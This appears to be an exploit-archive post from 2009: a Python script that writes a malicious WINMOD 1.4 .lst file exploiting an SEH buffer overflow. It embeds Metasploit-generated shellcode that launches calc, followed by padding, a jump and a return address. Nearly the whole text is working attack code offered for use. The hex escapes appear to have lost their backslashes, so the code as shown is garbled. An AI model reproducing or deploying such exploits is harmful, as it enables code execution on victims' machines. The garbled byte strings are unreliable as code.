winmod14-overflow.txt
Posted on 22 July 2009
#!/usr/bin/python #[*] Exploit : WINMOD 1.4 (.lst) Universal Buffer Overflow Exploit (SEH) #[*] Tested on : Xp sp2 fr #[*] Original exploit : http://www.milw0rm.com/exploits/9221 #[*] By : Dz_Girl #[*] Greets to : hisok4 (even if he doesn't know me) & all friends # win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com shellcode=( "xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49" "x49x49x49x49x37x49x49x49x49x49x49x49x51x5ax6ax41" "x58x50x30x42x31x41x42x6bx42x41x51x32x42x42x32x41" "x41x30x41x41x42x58x38x42x42x50x75x4bx59x4bx4cx59" "x78x52x64x63x30x65x50x53x30x4ex6bx57x35x77x4cx6c" "x4bx61x6cx63x35x73x48x67x71x48x6fx6ex6bx50x4fx45" "x48x6ex6bx53x6fx61x30x73x31x38x6bx53x79x4ex6bx66" "x54x6ex6bx46x61x38x6ex30x31x6bx70x6ex79x6ex4cx4f" "x74x79x50x74x34x44x47x4fx31x59x5ax76x6dx55x51x59" "x52x68x6bx4ax54x35x6bx71x44x65x74x37x74x31x65x4a" "x45x6ex6bx73x6fx44x64x55x51x4ax4bx50x66x4cx4bx44" "x4cx30x4bx6ex6bx53x6fx37x6cx46x61x58x6bx6cx4bx77" "x6cx6ex6bx46x61x5ax4bx4fx79x31x4cx47x54x37x74x6a" "x63x74x71x59x50x70x64x6ex6bx51x50x50x30x6ex65x4b" "x70x72x58x64x4cx6cx4bx71x50x56x6cx4ex6bx52x50x57" "x6cx6cx6dx4cx4bx63x58x73x38x5ax4bx45x59x4ex6bx4f" "x70x4cx70x35x50x43x30x63x30x4cx4bx53x58x77x4cx73" "x6fx56x51x48x76x53x50x66x36x4fx79x39x68x6fx73x39" "x50x61x6bx30x50x61x78x4ax50x6cx4ax73x34x33x6fx45" "x38x6dx48x49x6ex6cx4ax46x6ex76x37x69x6fx48x67x45" "x33x73x51x72x4cx71x73x63x30x41") payload = "DZ" payload += shellcode payload += "x41"*(2868-len(shellcode)) payload += "xE9xC7xF4xFFxFF" payload += "x61"*5 payload += "xEBxF4x41x41" payload += "x1Ex2Fx40x00" try: out_file = open("exploit.lst","w") out_file.write(payload) out_file.close() print(" Exploit file created! ") except: print "Error"
